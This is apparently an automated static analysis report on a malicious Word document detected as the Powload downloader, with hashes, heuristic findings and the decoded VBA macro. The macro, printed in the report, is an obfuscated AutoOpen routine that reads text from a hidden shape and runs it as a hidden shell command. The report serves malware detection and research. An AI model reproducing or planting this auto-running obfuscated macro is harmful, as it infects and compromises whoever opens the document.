Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1e4e09475ea19c73…

Verdict: MALICIOUS
File type: Office (OLE)

Size: 81.8 KB
Created: 2018-11-21 05:48:00
Authoring application: Microsoft Office Word
First seen: 2018-12-09
MD5: dc2c5cf95f3394e7eadbfa9a88726fc9
SHA-1: e27a30207a74195a98a13f0548718fc242a65eea
SHA-256: 1e4e09475ea19c7398d880ae1be2b0972f0f5404501effdd27bd66b63ae7b230
Risk score: 142

Heuristics (5)

  • ClamAV: Doc.Downloader.Powload-6769651-0 (severity: critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Powload-6769651-0
  • VBA macros detected (severity: medium, OLE_VBA_MACROS; 1 related finding)
    Document contains VBA macro code
  • AutoOpen macro (severity: high, OLE_VBA_AUTOOPEN)
    The VBA project defines an AutoOpen procedure, which Word runs automatically when the document is opened.
  • Legacy WordBasic auto-exec macro marker (severity: medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (severity: info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: document text, OLE body). This is the standard DrawingML XML namespace URI and is expected in Office content; it is not an indicator on its own.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 4317 bytes
SHA-256: 1f02b8d6f37196932880dd9c64eb6fd1d0ee72b35bcb0ad4d7879c67016420fc

Preview: first 1,000 lines of the extracted script (macros.bas)
Attribute VB_Name = "vfiQkVjmjUMaE"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   On Error Resume Next
      If XsisoOWj Xor mRlnc Then
         bJNwzj = KWORjG
      End If
      If BzHtTz Xor SEYBH Then
         rBfEjlZI = Sgn(VwlBKiIiX)
      End If
   QQAnKrT = (LIFowqB - CDbl(140986258) / rJhwj + Sgn(68556777)) - 25072658 + CInt(KHRpZKa) - 8917402 * Fix(147506319 * Oct(OqOUMPINz))
Set jzvApYQUq = jGwIAjBn
   On Error Resume Next
      If lLpXknlEZ Xor krikqDT Then
         UqKzE = QDpXAhmw
      End If
      If MItiFdhpv Xor RoFjanqE Then
         WakoHE = Sgn(hwOEs)
      End If
   lASbwZNa = (BOJnwKTO - CDbl(235585072) / cScQb + Sgn(137898856)) - 254937295 + CInt(wvjbrvb) - 20565919 * Fix(32846060 * Oct(zrRqtk))
Set WiUIwNk = tQWJjqG
Set PfCaWOLtF = Shapes("CnOchIQ")
   On Error Resume Next
      If qjOzDi Xor jGzkbVK Then
         KJKsGaJ = KWiJz
      End If
      If GbcqdqhNR Xor UajCQGj Then
         bYUpH = Sgn(dpjiDaZUb)
      End If
   AXHkrTuw = (fYjtHkEnd - CDbl(226960590) / iQUdNoK + Sgn(336120833)) - 64919348 + CInt(EAwwCswwI) - 50454555 * Fix(195490212 * Oct(zbazvZz))
Set nvlCFjDiX = JvnBb
   On Error Resume Next
      If EXzCr Xor HCqSK Then
         uohYQNoGF = uDrjhu
      End If
      If wGOnpDYV Xor fuQIotcA Then
         dOrsk = Sgn(wutduKITM)
      End If
   tMvJFl = (Dditp - CDbl(323766671) / AaqcDjs + Sgn(26210325)) - 141832848 + CInt(puKvbc) - 147866915 * Fix(177256138 * Oct(puhhq))
Set sFoPC = IzXcU
   On Error Resume Next
      If ucwRIkF Xor DlNQcNVY Then
         zztQvREjE = sDitTtYnI
      End If
      If iuftiCIkJ Xor tcqSbISI Then
         KtiEvMiZs = Sgn(XEZNbJFUz)
      End If
   tJTaWvQM = (RLbQpz - CDbl(20027436) / pkjzd + Sgn(104794238)) - 277358829 + CInt(dUPPJVoS) - 174984953 * Fix(35354168 * Oct(ZHizw))
Set NajvnkP = IQjTiQt
zJCYurYd = "" + japrbU + McALSmH + PfCaWOLtF.TextFrame.TextRange.Text + szbKaE + RjwnTG
   On Error Resume Next
      If zHWkjM Xor whJPSFIw Then
         hZBzQjPcR = uamCCaJ
      End If
      If YfZEqzTsA Xor BwVOupz Then
         jNuTrtTK = Sgn(ILiHpJ)
      End If
   kRTci = (fXjoa - CDbl(126764372) / ffwER + Sgn(303045269)) - 316998141 + CInt(Fnflf) - 217292170 * Fix(74609045 * Oct(VTMoLicW))
Set BdhXmDT = HmcPZpvNJ
   On Error Resume Next
      If PlZqpZf Xor fMucEiblZ Then
         swCpCE = FRIBzrCGQ
      End If
      If IIbFE Xor cXmEGZTj Then
         HLoISaj = Sgn(zkHWzhV)
      End If
   VoWSczKoK = (RPAkjwb - CDbl(166160789) / fOzwiYncV + Sgn(318272471)) - 100069385 + CInt(pQMkkzN) - 338723888 * Fix(63517030 * Oct(AzsIT))
Set ODJvYrp = XqnupVp
   On Error Resume Next
      If XkOoXI Xor FcoiXDm Then
         qtPsU = wItkj
      End If
      If KdlHmQUpJ Xor infnDZICw Then
         cGSojSq = Sgn(YbUEnK)
      End If
   bqjrGj = (rvOcMjBZA - CDbl(284523010) / EVDLzYTa + Sgn(61099636)) - 109822060 + CInt(bazVZbjb) - 72307416 * Fix(276645183 * Oct(fPXZHGJJz))
Set dQjpJQt = XfajI
   On Error Resume Next
      If olFRtES Xor hbdzqWUaH Then
         ZjpqSMXda = aiHwkrDkC
      End If
      If wRKqwKPiC Xor JICJR Then
         ozSstQd = Sgn(VDTjOwT)
      End If
   XJwIVwuI = (obXlRcwfG - CDbl(20641839) / RJDio + Sgn(254461154)) - 139223241 + CInt(qiTDjZlsK) - 59679732 * Fix(53539363 * Oct(DJvEpFnD))
Set VBIvOSN = PTidB
Interaction.Shell@ zJCYurYd + rHZpZjz + onXRNRzR, vbHide
   On Error Resume Next
      If NWvUt Xor fkRWlF Then
         KBwtk = dfIMoH
      End If
      If BfifjsY Xor UvukTif Then
         kJHGVDDL = Sgn(wLnbEJ)
      End If
   NUMzF = (qthdpFEJ - CDbl(112679892) / wwYDhADz + Sgn(180914089)) - 126494494 + CInt(jjkDPl) - 262861469 * Fix(151894472 * Oct(VfdzTNZrN))
Set HDfdpijGZ = ROYmSG
   On Error Resume Next
      If HGArpj Xor jUbdwvjEh Then
         SCKVK = EfnImrjEK
      End If
      If JIuVmWfwf Xor fOrrIdD Then

... (truncated)